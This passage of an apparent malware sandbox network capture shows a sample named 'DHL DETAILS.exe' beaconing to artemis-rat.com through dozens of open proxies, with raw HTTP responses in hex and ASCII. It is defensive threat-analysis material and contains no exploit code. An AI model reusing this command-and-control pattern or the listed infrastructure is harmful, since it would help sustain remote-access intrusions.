Mar 9, 2024 13:14:21.605290890 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:21 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1744	192.168.2.5	55243	94.130.94.45	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.834474087 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1745	192.168.2.5	55244	39.99.144.43	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.860847950 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.202697039 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1746	192.168.2.5	55246	8.219.179.237	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.884097099 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1747	192.168.2.5	55241	43.231.22.228	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.884490013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1748	192.168.2.5	54585	43.255.113.232	8083	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.888245106 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.240161896 CET	208	IN	HTTP/1.0 404 Not Found Server: HCS Date: Sat, 09 Mar 2024 15:01:47 GMT Content-Type: text/html Content-Length: 432 HCS-Error: ERR_FTP_NOT_FOUND 0 X-NGAA: MISS from CH-XW-NO1-315.3 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1749	192.168.2.5	55250	114.156.77.107	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.900216103 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1750	192.168.2.5	54725	45.81.232.17	53288	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.905081034 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1751	192.168.2.5	54759	161.97.163.52	32092	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.908263922 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:24.067488909 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1752	192.168.2.5	54798	107.148.201.157	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.976619005 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:24.020688057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.020576000 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1753	192.168.2.5	54858	45.173.12.141	1994	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.977955103 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:24.020787001 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:25.055989981 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1754	192.168.2.5	54612	182.48.77.173	8674	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.979060888 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1755	192.168.2.5	55253	43.155.170.35	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.992398024 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1756	192.168.2.5	55252	185.101.16.52	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.996788979 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1757	192.168.2.5	54784	45.65.137.218	999	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.010145903 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1758	192.168.2.5	54908	219.71.216.78	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.022622108 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1759	192.168.2.5	55255	139.224.64.191	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.025734901 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.351807117 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1760	192.168.2.5	55254	103.118.46.177	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.031126976 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1761	192.168.2.5	54859	61.178.152.31	7302	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.063056946 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.419333935 CET	90	IN	HTTP/1.1 200 OK Content-Type: application/json Connection: close Content-Length: 55

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1762	192.168.2.5	55251	103.109.59.209	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.090662956 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1763	192.168.2.5	55257	201.13.147.161	5678	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.100980997 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1764	192.168.2.5	55256	119.23.148.173	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.105396032 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1765	192.168.2.5	55261	8.217.44.229	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.148400068 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1766	192.168.2.5	54982	82.65.240.111	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.173614025 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:24.176938057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.177339077 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.177598000 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1767	192.168.2.5	51126	112.5.128.78	8060	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.178076029 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:24.333141088 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.333336115 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.146651983 CET	300	IN	HTTP/1.1 400 Bad Request Server: sws Date: Sat, 09 Mar 2024 12:16:33 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 36 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.15.6</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1768	192.168.2.5	53699	66.228.33.190	17464	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.200316906 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:24.379981995 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1769	192.168.2.5	54648	199.102.105.242	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.212424994 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1770	192.168.2.5	55265	199.58.185.9	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.212440968 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1771	192.168.2.5	51466	41.77.188.131	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.253283024 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:24.380057096 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.380307913 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.381565094 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1772	192.168.2.5	55263	195.87.217.75	3389	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.271410942 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1773	192.168.2.5	55266	203.222.24.36	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

